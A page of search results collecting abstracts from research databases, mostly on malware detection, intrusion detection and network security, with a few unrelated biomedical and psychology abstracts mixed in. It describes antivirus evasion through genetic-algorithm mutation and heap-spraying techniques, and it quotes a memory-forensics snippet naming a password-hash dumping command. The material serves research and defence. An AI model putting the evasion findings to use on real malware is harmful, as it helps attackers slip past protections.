Mobile Internet Protocol (IP) Local Area Network (LAN) is a technique, developed by the U.S. Army Research Laboratory, which allows a LAN to be IP mobile when attaching to a foreign IP-based network and using this network as a means to retain connectivity to its home network. In this paper, we describe a technique that uses Open Secure Shell (OpenSSH) software to ensure secure, encrypted transmission of a mobile LAN's network traffic. Whenever a mobile LAN, implemented with Mobile IP LAN, moves to a foreign network, its gateway (router) obtains an IP address from the new network. IP tunnels, using IP encapsulation, are then established from the gateway through the foreign network to a home agent on its home network. These tunnels provide a virtual two-way connection to the home network for the mobile LAN as if the LAN were connected directly to its home network. Hence, when IP mobile, a mobile LAN's tunneled network traffic must traverse one or more foreign networks that may not be trusted. This traffic could be subject to eavesdropping, interception, modification, or redirection by malicious nodes in these foreign networks. To protect network traffic passing through the tunnels, OpenSSH is used as a means of encryption because it prevents surveillance, modification, and redirection of mobile LAN traffic passing across foreign networks. Since the software is found in the public domain, is available for most current operating systems, and is commonly used to provide secure network communications, OpenSSH is the software of choice.

Detecting Heap-Spraying Code Injection Attacks in Malicious Web Pages Using Runtime Execution

NASA Astrophysics Data System (ADS)

Choi, Younghan; Kim, Hyoungchun; Lee, Donghoon

The growing use of web services is increasing web browser attacks exponentially. Most attacks use a technique called heap spraying because of its high success rate. Heap spraying executes a malicious code without indicating the exact address of the code by copying it into many heap objects. For this reason, the attack has a high potential to succeed if only the vulnerability is exploited. Thus, attackers have recently begun using this technique because it is easy to use JavaScript to allocate the heap memory area. This paper proposes a novel technique that detects heap spraying attacks by executing a heap object in a real environment, irrespective of the version and patch status of the web browser. This runtime execution is used to detect various forms of heap spraying attacks, such as encoding and polymorphism. Heap objects are executed after being filtered on the basis of patterns of heap spraying attacks in order to reduce the overhead of the runtime execution. Patterns of heap spraying attacks are based on analysis of how an web browser accesses benign web sites. The heap objects are executed forcibly by changing the instruction register into the address of them after being loaded into memory. Thus, we can execute the malicious code without having to consider the version and patch status of the browser. An object is considered to contain a malicious code if the execution reaches a call instruction and then the instruction accesses the API of system libraries, such as kernel32.dll and ws_32.dll. To change registers and monitor execution flow, we used a debugger engine. A prototype, named HERAD(HEap spRAying Detector), is implemented and evaluated. In experiments, HERAD detects various forms of exploit code that an emulation cannot detect, and some heap spraying attacks that NOZZLE cannot detect. Although it has an execution overhead, HERAD produces a low number of false alarms. The processing time of several minutes is negligible because our research focuses on detecting heap spraying. This research can be applied to existing systems that collect malicious codes, such as Honeypot.

Identifying and Embedding Common Indicators of Compromise in Virtual Machines for Lab-Based Incident Response Education

DTIC Science & Technology

2015-09-01

resistant to an attack. However, with techniques and motives ever-changing, it is not realistic to think that any organization is immune to threat...Berkeley, CA: McGraw- Hill/Osborne. Sikorski, M., & Honig, A. (2012). Practical malware analysis. San Francisco: No Starch Press. Skoudis, E

Malware Memory Analysis for Non specialists: Investigating Publicly Available Memory Images for Prolaco and SpyEye

DTIC Science & Technology

2013-10-01

1_doc_RCData_612|virus|Trojan|rootkit|worm|Prolaco|rundll|msiexec|google|wmimngr|jusche d|wfmngr|wupmgr| java |wpmgr|nvscpapisvr)’ ” results in the...hashdump Dumps passwords hashes (LM/NTLM) from memory hibinfo Dump hibernation file information hivedump Prints out a hive hivelist Print list of

A Hybrid Computing Testbed for Mobile Threat Detection and Enhanced Research and Education in Information

DTIC Science & Technology

2014-11-20

techniques to defend against stealthy malware, i.e., rootkits. For example, we have been developing new virtualization-based security service called AirBag ...for mobile devices. AirBag is a virtualization-based system that enables dynamic switching of (guest) Android im- ages in one VM, with one image

Examining the Relationship of Business Operations and the Information Security Culture in the United States

ERIC Educational Resources Information Center

Wynn, Cynthia L.

2017-01-01

An increase in information technology has caused and increased in threats towards information security. Threats are malware, viruses, sabotage from employees, and hacking into computer systems. Organizations have to find new ways to combat vulnerabilities and threats of internal and external threats to protect their information security and…

77 FR 16229 - Announcement of Requirements and Registration for the “2012 ASPR Challenge Titled Now Trending...

Federal Register 2010, 2011, 2012, 2013, 2014

2012-03-20

... that their submission is free of malware. Each Contestant also warrants that he or she has complied..., royalty-free nonexclusive worldwide license to post, link to, share, and display publicly the submission... to ASPR an irrevocable, paid-up, royalty-free nonexclusive worldwide license to use winning...

DOE Office of Scientific and Technical Information (OSTI.GOV)

Jason L. Wright; Milos Manic

Finding and identifying cryptography is a growing concern in the malware analysis community. In this paper, artificial neural networks are used to classify functional blocks from a disassembled program as being either cryptography related or not. The resulting system, referred to as NNLC (Neural Net for Locating Cryptography) is presented and results of applying this system to various libraries are described.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Jason L. Wright

Finding and identifying Cryptography is a growing concern in the malware analysis community. In this paper, a heuristic method for determining the likelihood that a given function contains a cryptographic algorithm is discussed and the results of applying this method in various environments is shown. The algorithm is based on frequency analysis of opcodes that make up each function within a binary.

75 FR 14429 - Agency Information Collection Activities; Submission for Office of Management and Budget Review...

Federal Register 2010, 2011, 2012, 2013, 2014

2010-03-25

... regular security audits and have been certified for operation. The CPSC observes all industry and Federal government best practices for network security. CPSC staff regularly analyzes its systems for vulnerabilities and malware, and monitor the network for real-time intrusion attempts. B. Estimated Burden The CPSC...

Adversarial Feature Selection Against Evasion Attacks.

PubMed

Zhang, Fei; Chan, Patrick P K; Biggio, Battista; Yeung, Daniel S; Roli, Fabio

2016-03-01

Pattern recognition and machine learning techniques have been increasingly adopted in adversarial settings such as spam, intrusion, and malware detection, although their security against well-crafted attacks that aim to evade detection by manipulating data at test time has not yet been thoroughly assessed. While previous work has been mainly focused on devising adversary-aware classification algorithms to counter evasion attempts, only few authors have considered the impact of using reduced feature sets on classifier security against the same attacks. An interesting, preliminary result is that classifier security to evasion may be even worsened by the application of feature selection. In this paper, we provide a more detailed investigation of this aspect, shedding some light on the security properties of feature selection against evasion attacks. Inspired by previous work on adversary-aware classifiers, we propose a novel adversary-aware feature selection model that can improve classifier security against evasion attacks, by incorporating specific assumptions on the adversary's data manipulation strategy. We focus on an efficient, wrapper-based implementation of our approach, and experimentally validate its soundness on different application examples, including spam and malware detection.

Can genetic algorithms help virus writers reshape their creations and avoid detection?

NASA Astrophysics Data System (ADS)

Abu Doush, Iyad; Al-Saleh, Mohammed I.

2017-11-01

Different attack and defence techniques have been evolved over time as actions and reactions between black-hat and white-hat communities. Encryption, polymorphism, metamorphism and obfuscation are among the techniques used by the attackers to bypass security controls. On the other hand, pattern matching, algorithmic scanning, emulation and heuristic are used by the defence team. The Antivirus (AV) is a vital security control that is used against a variety of threats. The AV mainly scans data against its database of virus signatures. Basically, it claims a virus if a match is found. This paper seeks to find the minimal possible changes that can be made on the virus so that it will appear normal when scanned by the AV. Brute-force search through all possible changes can be a computationally expensive task. Alternatively, this paper tries to apply a Genetic Algorithm in solving such a problem. Our proposed algorithm is tested on seven different malware instances. The results show that in all the tested malware instances only a small change in each instance was good enough to bypass the AV.

A framework for analyzing the impact of data integrity/quality on electricity market operations

NASA Astrophysics Data System (ADS)

Choi, Dae Hyun

This dissertation examines the impact of data integrity/quality in the supervisory control and data acquisition (SCADA) system on real-time locational marginal price (LMP) in electricity market operations. Measurement noise and/or manipulated sensor errors in a SCADA system may mislead system operators about real-time conditions in a power system, which, in turn, may impact the price signals in real-time power markets. This dissertation serves as a first attempt to analytically investigate the impact of bad/malicious data on electric power market operations. In future power system operations, which will probably involve many more sensors, the impact of sensor data integrity/quality on grid operations will become increasingly important. The first part of this dissertation studies from a market participant's perspective a new class of malicious data attacks on state estimation, which subsequently influences the result of the newly emerging look-ahead dispatch models in the real-time power market. In comparison with prior work of cyber-attack on static dispatch where no inter-temporal ramping constraint is considered, we propose a novel attack strategy, named ramp-induced data (RID) attack, with which the attacker can manipulate the limits of ramp constraints of generators in look-ahead dispatch. It is demonstrated that the proposed attack can lead to financial profits via malicious capacity withholding of selected generators, while being undetected by the existing bad data detection algorithm embedded in today's state estimation software. In the second part, we investigate from a system operator's perspective the sensitivity of locational marginal price (LMP) with respect to data corruption-induced state estimation error in real-time power market. Two data corruption scenarios are considered, in which corrupted continuous data (e.g., the power injection/flow and voltage magnitude) falsify power flow estimate whereas corrupted discrete data (e.g., the on/off status of a circuit breaker) do network topology estimate, thus leading to the distortion of LMP. We present an analytical framework to quantify real-time LMP sensitivity subject to continuous and discrete data corruption via state estimation. The proposed framework offers system operators an analytical tool to identify economically sensitive buses and transmission lines to data corruption as well as find sensors that impact LMP changes significantly. This dissertation serves as a first step towards rigorous understanding of the fundamental coupling among cyber, physical and economical layers of operations in future smart grid.

Tumor Microenvironment Modulation via Gold Nanoparticles Targeting Malicious Exosomes: Implications for Cancer Diagnostics and Therapy

PubMed Central

Roma-Rodrigues, Catarina; Raposo, Luís R.; Cabral, Rita; Paradinha, Fabiana; Baptista, Pedro V.; Fernandes, Alexandra R.

2017-01-01

Exosomes are nanovesicles formed in the endosomal pathway with an important role in paracrine and autocrine cell communication. Exosomes secreted by cancer cells, malicious exosomes, have important roles in tumor microenvironment maturation and cancer progression. The knowledge of the role of exosomes in tumorigenesis prompted a new era in cancer diagnostics and therapy, taking advantage of the use of circulating exosomes as tumor biomarkers due to their stability in body fluids and targeting malignant exosomes’ release and/or uptake to inhibit or delay tumor development. In recent years, nanotechnology has paved the way for the development of a plethora of new diagnostic and therapeutic platforms, fostering theranostics. The unique physical and chemical properties of gold nanoparticles (AuNPs) make them suitable vehicles to pursuit this goal. AuNPs’ properties such as ease of synthesis with the desired shape and size, high surface:volume ratio, and the possibility of engineering their surface as desired, potentiate AuNPs’ role in nanotheranostics, allowing the use of the same formulation for exosome detection and restraining the effect of malicious exosomes in cancer progression. PMID:28098821

Persona: Network Layer Anonymity and Accountability for Next Generation Internet

NASA Astrophysics Data System (ADS)

Mallios, Yannis; Modi, Sudeep; Agarwala, Aditya; Johns, Christina

Individual privacy has become a major concern, due to the intrusive nature of the services and websites that collect increasing amounts of private information. One of the notions that can lead towards privacy protection is that of anonymity. Unfortunately, anonymity can also be maliciously exploited by attackers to hide their actions and identity. Thus some sort of accountability is also required. The current Internet has failed to provide both properties, as anonymity techniques are difficult to fully deploy and thus are easily attacked, while the Internet provides limited level of accountability. The Next Generation Internet (NGI) provides us with the opportunity to examine how these conflicting properties could be efficiently applied and thus protect users’ privacy while holding malicious users accountable. In this paper we present the design of a scheme, called Persona that can provide anonymity and accountability in the network layer of NGI. More specifically, our design requirements are to combine these two conflicting desires in a stateless manner within routers. Persona allows users to choose different levels of anonymity, while it allows the discovery of malicious nodes.

Tumor Microenvironment Modulation via Gold Nanoparticles Targeting Malicious Exosomes: Implications for Cancer Diagnostics and Therapy.

PubMed

Roma-Rodrigues, Catarina; Raposo, Luís R; Cabral, Rita; Paradinha, Fabiana; Baptista, Pedro V; Fernandes, Alexandra R

2017-01-14

Exosomes are nanovesicles formed in the endosomal pathway with an important role in paracrine and autocrine cell communication. Exosomes secreted by cancer cells, malicious exosomes, have important roles in tumor microenvironment maturation and cancer progression. The knowledge of the role of exosomes in tumorigenesis prompted a new era in cancer diagnostics and therapy, taking advantage of the use of circulating exosomes as tumor biomarkers due to their stability in body fluids and targeting malignant exosomes' release and/or uptake to inhibit or delay tumor development. In recent years, nanotechnology has paved the way for the development of a plethora of new diagnostic and therapeutic platforms, fostering theranostics. The unique physical and chemical properties of gold nanoparticles (AuNPs) make them suitable vehicles to pursuit this goal. AuNPs' properties such as ease of synthesis with the desired shape and size, high surface:volume ratio, and the possibility of engineering their surface as desired, potentiate AuNPs' role in nanotheranostics, allowing the use of the same formulation for exosome detection and restraining the effect of malicious exosomes in cancer progression.

Agents Based e-Commerce and Securing Exchanged Information

NASA Astrophysics Data System (ADS)

Al-Jaljouli, Raja; Abawajy, Jemal

Mobile agents have been implemented in e-Commerce to search and filter information of interest from electronic markets. When the information is very sensitive and critical, it is important to develop a novel security protocol that can efficiently protect the information from malicious tampering as well as unauthorized disclosure or at least detect any malicious act of intruders. In this chapter, we describe robust security techniques that ensure a sound security of information gathered throughout agent’s itinerary against various security attacks, as well as truncation attacks. A sound security protocol is described, which implements the various security techniques that would jointly prevent or at least detect any malicious act of intruders. We reason about the soundness of the protocol usingSymbolic Trace Analyzer (STA), a formal verification tool that is based on symbolic techniques. We analyze the protocol in key configurations and show that it is free of flaws. We also show that the protocol fulfils the various security requirements of exchanged information in MAS, including data-integrity, data-confidentiality, data-authenticity, origin confidentiality and data non-repudiability.

Real-time detection and classification of anomalous events in streaming data

DOE Office of Scientific and Technical Information (OSTI.GOV)

Ferragut, Erik M.; Goodall, John R.; Iannacone, Michael D.

2016-04-19

A system is described for receiving a stream of events and scoring the events based on anomalousness and maliciousness (or other classification). The events can be displayed to a user in user-defined groupings in an animated fashion. The system can include a plurality of anomaly detectors that together implement an algorithm to identify low probability events and detect atypical traffic patterns. The atypical traffic patterns can then be classified as being of interest or not. In one particular example, in a network environment, the classification can be whether the network traffic is malicious or not.

Cyberbiosecurity: From Naive Trust to Risk Awareness.

PubMed

Peccoud, Jean; Gallegos, Jenna E; Murch, Randall; Buchholz, Wallace G; Raman, Sanjay

2018-01-01

The cyber-physical nature of biotechnology raises unprecedented security concerns. Computers can be compromised by encoding malware in DNA sequences, and biological threats can be synthesized using publicly available data. Trust within the biotechnology community creates vulnerabilities at the interface between cyberspace and biology. Awareness is a prerequisite to managing these risks. Copyright © 2017 Elsevier Ltd. All rights reserved.

Spam Stoppers: Stave off the Spam Onslaught with Technology and Training

ERIC Educational Resources Information Center

Fryer, Wesley A.

2005-01-01

For schools, spam is not only an annoyance and a time waster; it clogs district mail servers, consumes valuable network bandwidth, and can deliver and propagate a variety of malware programs that can wreak havoc on their system. A district strategy to "can the spam," therefore, must be multifaceted and address security vulnerabilities at different…

Intense or malicious? The decoding of eyebrow-lowering frowning in laughter animations depends on the presentation mode

PubMed Central

Hofmann, Jennifer

2014-01-01

Joyful laughter is the only laughter type that has received sufficient validation in terms of morphology (i.e., face, voice). Still, it is unclear whether joyful laughter involves one prototypical facial-morphological configuration (Duchenne Display and mouth opening) to be decoded as such, or whether qualitatively distinct facial markers occur at different stages of laughter intensity. It was proposed that intense laughter goes along with eyebrow-lowering frowning, but in decoding studies of pictures, these “frowns” were associated with perceived maliciousness rather than higher intensity. Thus, two studies were conducted to investigate the influence of the presentation mode (static, dynamic) and eyebrow-lowering frowning on the perception of laughter animations of different intensity. In Study 1, participants (N = 110) were randomly assigned to two presentation modes (static pictures vs. dynamic videos) to watch animations of Duchenne laughter and laughter with added eyebrow-lowering frowning. Ratings on the intensity, valence, and contagiousness of the laughter were completed. In Study 2, participants (N = 55) saw both animation types in both presentation modes sequentially. Results confirmed that the static presentation lead to eyebrow-lowering frowning in intense laughter being perceived as more malicious, less intense, less benevolent, and less contagious compared to the dynamic presentation. This was replicated for maliciousness in Study 2, although participants could potentially infer the “frown” as a natural element of the laugh, as they had seen the video and the picture. Thus, a dynamic presentation is necessary for detecting graduating intensity markers in the joyfully laughing face. While this study focused on the decoding, future studies should investigate the encoding of frowning in laughter. This is important, as tools assessing facially expressed joy might need to account for laughter intensity markers that differ from the Duchenne Display. PMID:25477836

Intense or malicious? The decoding of eyebrow-lowering frowning in laughter animations depends on the presentation mode.

PubMed

Hofmann, Jennifer

2014-01-01

Joyful laughter is the only laughter type that has received sufficient validation in terms of morphology (i.e., face, voice). Still, it is unclear whether joyful laughter involves one prototypical facial-morphological configuration (Duchenne Display and mouth opening) to be decoded as such, or whether qualitatively distinct facial markers occur at different stages of laughter intensity. It was proposed that intense laughter goes along with eyebrow-lowering frowning, but in decoding studies of pictures, these "frowns" were associated with perceived maliciousness rather than higher intensity. Thus, two studies were conducted to investigate the influence of the presentation mode (static, dynamic) and eyebrow-lowering frowning on the perception of laughter animations of different intensity. In Study 1, participants (N = 110) were randomly assigned to two presentation modes (static pictures vs. dynamic videos) to watch animations of Duchenne laughter and laughter with added eyebrow-lowering frowning. Ratings on the intensity, valence, and contagiousness of the laughter were completed. In Study 2, participants (N = 55) saw both animation types in both presentation modes sequentially. Results confirmed that the static presentation lead to eyebrow-lowering frowning in intense laughter being perceived as more malicious, less intense, less benevolent, and less contagious compared to the dynamic presentation. This was replicated for maliciousness in Study 2, although participants could potentially infer the "frown" as a natural element of the laugh, as they had seen the video and the picture. Thus, a dynamic presentation is necessary for detecting graduating intensity markers in the joyfully laughing face. While this study focused on the decoding, future studies should investigate the encoding of frowning in laughter. This is important, as tools assessing facially expressed joy might need to account for laughter intensity markers that differ from the Duchenne Display.

E-commerce Review System to Detect False Reviews.

PubMed

Kolhar, Manjur

2017-08-15

E-commerce sites have been doing profitable business since their induction in high-speed and secured networks. Moreover, they continue to influence consumers through various methods. One of the most effective methods is the e-commerce review rating system, in which consumers provide review ratings for the products used. However, almost all e-commerce review rating systems are unable to provide cumulative review ratings. Furthermore, review ratings are influenced by positive and negative malicious feedback ratings, collectively called false reviews. In this paper, we proposed an e-commerce review system framework developed using the cumulative sum method to detect and remove malicious review ratings.

Trust recovery model of Ad Hoc network based on identity authentication scheme

NASA Astrophysics Data System (ADS)

Liu, Jie; Huan, Shuiyuan

2017-05-01

Mobile Ad Hoc network trust model is widely used to solve mobile Ad Hoc network security issues. Aiming at the problem of reducing the network availability caused by the processing of malicious nodes and selfish nodes in mobile Ad Hoc network routing based on trust model, an authentication mechanism based on identity authentication mobile Ad Hoc network is proposed, which uses identity authentication to identify malicious nodes, And trust the recovery of selfish nodes in order to achieve the purpose of reducing network congestion and improving network quality. The simulation results show that the implementation of the mechanism can effectively improve the network availability and security.

Dataset of anomalies and malicious acts in a cyber-physical subsystem.

PubMed

Laso, Pedro Merino; Brosset, David; Puentes, John

2017-10-01

This article presents a dataset produced to investigate how data and information quality estimations enable to detect aNomalies and malicious acts in cyber-physical systems. Data were acquired making use of a cyber-physical subsystem consisting of liquid containers for fuel or water, along with its automated control and data acquisition infrastructure. Described data consist of temporal series representing five operational scenarios - Normal, aNomalies, breakdown, sabotages, and cyber-attacks - corresponding to 15 different real situations. The dataset is publicly available in the .zip file published with the article, to investigate and compare faulty operation detection and characterization methods for cyber-physical systems.

Host-Based Multivariate Statistical Computer Operating Process Anomaly Intrusion Detection System (PAIDS)

DTIC Science & Technology

2009-03-01

viii 3.2.3 Sub7 ...from TaskInfo in Excel Format. 3.2.3 Sub7 Also known as SubSeven, this is one of the best known, most widely distributed backdoor programs on the...engineering the spread of viruses, worms, backdoors and other malware. The Sub7 Trojan establishes a server on the victim computer that

Communication Breakdown: DHS Operations During a Cyber Attack

DTIC Science & Technology

2010-12-01

is estimated to average 1 hour per response, including the time for reviewing instruction, searching existing data sources, gathering and...maintaining the data needed, and completing and reviewing the collection of information. Send comments regarding this burden estimate or any other aspect of...Presidential Directive, Malware, National Exercise, Quadrennial Homeland Security Review , Trusted Internet Connections, Zero-Day Exploits 16. PRICE CODE 17

SEADE: Countering the Futility of Network Security

DTIC Science & Technology

2015-10-01

guards, and computer cages) and logical security measures (network firewall and intrusion detection). However, no matter how many layers of network...security built-in and with minimal security dependence on network security appliances (e.g., firewalls ). As Secretary of Defense Ashton Carter...based analysis that assumes nothing bad will happen to applications/data if those defenses prevent malware transactions at the entrance. The

File Carving and Malware Identification Algorithms Applied to Firmware Reverse Engineering

DTIC Science & Technology

2013-03-21

33 3.5 Performance Metrics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35 3.6 Experimental...consider a byte value rate-of-change frequency metric [32]. Their system calculates the absolute value of the distance between all consecutive bytes, then...the rate-of-change means and standard deviations. Karresand and Shahmehri use the same distance metric for both byte value frequency and rate-of-change

QuEST for malware type-classification

NASA Astrophysics Data System (ADS)

Vaughan, Sandra L.; Mills, Robert F.; Grimaila, Michael R.; Peterson, Gilbert L.; Oxley, Mark E.; Dube, Thomas E.; Rogers, Steven K.

2015-05-01

Current cyber-related security and safety risks are unprecedented, due in no small part to information overload and skilled cyber-analyst shortages. Advances in decision support and Situation Awareness (SA) tools are required to support analysts in risk mitigation. Inspired by human intelligence, research in Artificial Intelligence (AI) and Computational Intelligence (CI) have provided successful engineering solutions in complex domains including cyber. Current AI approaches aggregate large volumes of data to infer the general from the particular, i.e. inductive reasoning (pattern-matching) and generally cannot infer answers not previously programmed. Whereas humans, rarely able to reason over large volumes of data, have successfully reached the top of the food chain by inferring situations from partial or even partially incorrect information, i.e. abductive reasoning (pattern-completion); generating a hypothetical explanation of observations. In order to achieve an engineering advantage in computational decision support and SA we leverage recent research in human consciousness, the role consciousness plays in decision making, modeling the units of subjective experience which generate consciousness, qualia. This paper introduces a novel computational implementation of a Cognitive Modeling Architecture (CMA) which incorporates concepts of consciousness. We apply our model to the malware type-classification task. The underlying methodology and theories are generalizable to many domains.

Omen: identifying potential spear-phishing targets before the email is sent.

DOE Office of Scientific and Technical Information (OSTI.GOV)

Wendt, Jeremy Daniel.

2013-07-01

We present the results of a two year project focused on a common social engineering attack method called "spear phishing". In a spear phishing attack, the user receives an email with information specifically focused on the user. This email contains either a malware-laced attachment or a link to download the malware that has been disguised as a useful program. Spear phishing attacks have been one of the most effective avenues for attackers to gain initial entry into a target network. This project focused on a proactive approach to spear phishing. To create an effective, user-specific spear phishing email, the attackermore » must research the intended recipient. We believe that much of the information used by the attacker is provided by the target organization's own external website. Thus when researching potential targets, the attacker leaves signs of his research in the webserver's logs. We created tools and visualizations to improve cybersecurity analysts' abilities to quickly understand a visitor's visit patterns and interests. Given these suspicious visitors and log-parsing tools, analysts can more quickly identify truly suspicious visitors, search for potential spear-phishing targeted users, and improve security around those users before the spear phishing email is sent.« less

A Survey on Anomaly Based Host Intrusion Detection System

NASA Astrophysics Data System (ADS)

Jose, Shijoe; Malathi, D.; Reddy, Bharath; Jayaseeli, Dorathi

2018-04-01

An intrusion detection system (IDS) is hardware, software or a combination of two, for monitoring network or system activities to detect malicious signs. In computer security, designing a robust intrusion detection system is one of the most fundamental and important problems. The primary function of system is detecting intrusion and gives alerts when user tries to intrusion on timely manner. In these techniques when IDS find out intrusion it will send alert massage to the system administrator. Anomaly detection is an important problem that has been researched within diverse research areas and application domains. This survey tries to provide a structured and comprehensive overview of the research on anomaly detection. From the existing anomaly detection techniques, each technique has relative strengths and weaknesses. The current state of the experiment practice in the field of anomaly-based intrusion detection is reviewed and survey recent studies in this. This survey provides a study of existing anomaly detection techniques, and how the techniques used in one area can be applied in another application domain.

IT Security Support for the Spaceport Command Control System Development

NASA Technical Reports Server (NTRS)

Varise, Brian

2014-01-01

My job title is IT Security support for the Spaceport Command & Control System Development. As a cyber-security analyst it is my job to ensure NASA's information stays safe from cyber threats, such as, viruses, malware and denial-of-service attacks by establishing and enforcing system access controls. Security is very important in the world of technology and it is used everywhere from personal computers to giant networks ran by Government agencies worldwide. Without constant monitoring analysis, businesses, public organizations and government agencies are vulnerable to potential harmful infiltration of their computer information system. It is my responsibility to ensure authorized access by examining improper access, reporting violations, revoke access, monitor information request by new programming and recommend improvements. My department oversees the Launch Control System and networks. An audit will be conducted for the LCS based on compliance with the Federal Information Security Management Act (FISMA) and The National Institute of Standards and Technology (NIST). I recently finished analyzing the SANS top 20 critical controls to give cost effective recommendations on various software and hardware products for compliance. Upon my completion of this internship, I will have successfully completed my duties as well as gain knowledge that will be helpful to my career in the future as a Cyber Security Analyst.

Wireless Networks under a Backoff Attack: A Game Theoretical Perspective.

PubMed

Parras, Juan; Zazo, Santiago

2018-01-30

We study a wireless sensor network using CSMA/CA in the MAC layer under a backoff attack: some of the sensors of the network are malicious and deviate from the defined contention mechanism. We use Bianchi's network model to study the impact of the malicious sensors on the total network throughput, showing that it causes the throughput to be unfairly distributed among sensors. We model this conflict using game theory tools, where each sensor is a player. We obtain analytical solutions and propose an algorithm, based on Regret Matching, to learn the equilibrium of the game with an arbitrary number of players. Our approach is validated via simulations, showing that our theoretical predictions adjust to reality.

Prevention of Malicious Nodes Communication in MANETs by Using Authorized Tokens

NASA Astrophysics Data System (ADS)

Chandrakant, N.; Shenoy, P. Deepa; Venugopal, K. R.; Patnaik, L. M.

A rapid increase of wireless networks and mobile computing applications has changed the landscape of network security. A MANET is more susceptible to the attacks than wired network. As a result, attacks with malicious intent have been and will be devised to take advantage of these vulnerabilities and to cripple the MANET operation. Hence we need to search for new architecture and mechanisms to protect the wireless networks and mobile computing applications. In this paper, we examine the nodes that come under the vicinity of base node and members of the network and communication is provided to genuine nodes only. It is found that the proposed algorithm is a effective algorithm for security in MANETs.

Accelerating Malware Detection via a Graphics Processing Unit

DTIC Science & Technology

2010-09-01

Processing Unit . . . . . . . . . . . . . . . . . . 4 PE Portable Executable . . . . . . . . . . . . . . . . . . . . . 4 COFF Common Object File Format...operating systems for the future [Szo05]. The PE format is an updated version of the common object file format ( COFF ) [Mic06]. Microsoft released a new...NAs02]. These alerts can be costly in terms of time and resources for individuals and organizations to investigate each misidentified file [YWL07] [Vak10

Achieving Accountability in Cyberspace: Revolution or Evolution?

DTIC Science & Technology

2014-01-01

hours, the malware propagates throughout both networks and begins to beacon to a site known for its state - sponsored cyberspace espionage activities...installation in the United States , communications personnel in a tenant unit, whose primary unclassified operating network is neither owned nor...protect its unclas- sified proprietary network. A known nation- state actor gains access to the company’s network and begins to exfil- trate megabytes

Visualization of Wind Data on Google Earth for the Three-dimensional Wind Field (3DWF) Model

DTIC Science & Technology

2012-09-01

ActiveX components or XPCOM extensions can be used by JavaScript to write data to the local file system. Since there is an inherent risk, it is very...important to only use these types of objects ( ActiveX or XPCOM) from a trusted source in order to minimize the exposure of a computer system to malware

Anomaly-Based Intrusion Detection Systems Utilizing System Call Data

DTIC Science & Technology

2012-03-01

Functionality Description Persistence mechanism Mimicry technique Camouflage malware image: • renaming its image • appending its image to victim...particular industrial plant . Exactly which one was targeted still remains unknown, however a majority of the attacks took place in Iran [24]. Due... plant to unstable phase and eventually physical damage. It is interesting to note that a particular block of code - block DB8061 is automatically

Identification of Program Signatures from Cloud Computing System Telemetry Data

DOE Office of Scientific and Technical Information (OSTI.GOV)

Nichols, Nicole M.; Greaves, Mark T.; Smith, William P.

Malicious cloud computing activity can take many forms, including running unauthorized programs in a virtual environment. Detection of these malicious activities while preserving the privacy of the user is an important research challenge. Prior work has shown the potential viability of using cloud service billing metrics as a mechanism for proxy identification of malicious programs. Previously this novel detection method has been evaluated in a synthetic and isolated computational environment. In this paper we demonstrate the ability of billing metrics to identify programs, in an active cloud computing environment, including multiple virtual machines running on the same hypervisor. The openmore » source cloud computing platform OpenStack, is used for private cloud management at Pacific Northwest National Laboratory. OpenStack provides a billing tool (Ceilometer) to collect system telemetry measurements. We identify four different programs running on four virtual machines under the same cloud user account. Programs were identified with up to 95% accuracy. This accuracy is dependent on the distinctiveness of telemetry measurements for the specific programs we tested. Future work will examine the scalability of this approach for a larger selection of programs to better understand the uniqueness needed to identify a program. Additionally, future work should address the separation of signatures when multiple programs are running on the same virtual machine.« less

Safety and security of radioactive sources in industrial radiography in Bangladesh

DOE Office of Scientific and Technical Information (OSTI.GOV)

Mollah, A. S.; Nazrul, M. Abdullah

2013-07-01

Malicious use of radioactive sources can involve dispersal of that material through an explosive device. There has been recognition of the threat posed by the potential malicious misuse of NDT radioactive source by terrorists. The dispersal of radioactive material using conventional explosives, referred to as a 'dirty bomb', could create considerable panic, disruption and area access denial in an urban environment. However, as it is still a relatively new topic among regulators, users, and transport and storage operators worldwide, international assistance and cooperation in developing the necessary regulatory and security infrastructure is required. The most important action in reducing themore » risk of radiological terrorism is to increase the security of radioactive sources. This paper presents safety and security considerations for the transport and site storage of the industrial radiography sources as per national regulations entitled 'Nuclear Safety and Radiation Control Rules-1997'.The main emphasis was put on the stages of some safety and security actions in order to prevent theft, sabotage or other malicious acts during the transport of the packages. As a conclusion it must be mentioned that both safety and security considerations are very important aspects that must be taking in account for the transport and site storage of radioactive sources used in the practice of industrial radiography. (authors)« less

Transport Traffic Analysis for Abusive Infrastructure Characterization

DTIC Science & Technology

2012-12-14

Introduction Abusive traffic abounds on the Internet, in the form of email, malware, vulnerability scanners, worms, denial-of-service, drive-by-downloads, scam ...insight is two-fold. First, attackers have a basic requirement to source large amounts of data, be it denial-of-service, scam -hosting, spam, or other...the network core. This paper explores the power of transport-layer traffic analysis to detect and characterize scam hosting infrastructure, including

A Cyber Pearl Harbor

DTIC Science & Technology

2016-02-03

specific intrusions that can vary in costs and damage. These medium- potential tools are used to access systems, sustain access, and hide access. In the...appropriate response. A cyber intrusion aimed at spying or extracting data will drive different international and domestic responses than a weapon...stealing credit cards or data to a DDoS or creating and selling malware to the highest bidder. Insecure cyberspace is a crime syndicate’s dream in

Using Streaming Analytics for Effective Real Time Network Visibility -

Science.gov Websites

problem before it became a big issue. That's just one use case as to how you can make use of this sort of , having the ability to see all of your network traffic in one place, single pane of glass, will allow you , malware detection devices, other networks' ability tools. I was never able to see everything in one spot

T-dominance: Prioritized Defense Deployment for BYOD Security (Post Print)

DTIC Science & Technology

2013-10-01

infrastructure. Employees’ demand/ satisfaction , decreased IT acquisition and support cost, and increased use of cloud/virtualization technologies in...example, a report [8] on hijacking hotel Wi-Fi hotspots for drive-by malware attacks on laptops comes close to what we have in mind; practical man-in...obtaining unwarranted privilege, are often ignored for convenience, or circumvented for customization by the users. Rootkits, like iOS Jailbreak5, are

Wireless Networks under a Backoff Attack: A Game Theoretical Perspective

PubMed Central

Zazo, Santiago

2018-01-01

We study a wireless sensor network using CSMA/CA in the MAC layer under a backoff attack: some of the sensors of the network are malicious and deviate from the defined contention mechanism. We use Bianchi’s network model to study the impact of the malicious sensors on the total network throughput, showing that it causes the throughput to be unfairly distributed among sensors. We model this conflict using game theory tools, where each sensor is a player. We obtain analytical solutions and propose an algorithm, based on Regret Matching, to learn the equilibrium of the game with an arbitrary number of players. Our approach is validated via simulations, showing that our theoretical predictions adjust to reality. PMID:29385752

An enhanced performance through agent-based secure approach for mobile ad hoc networks

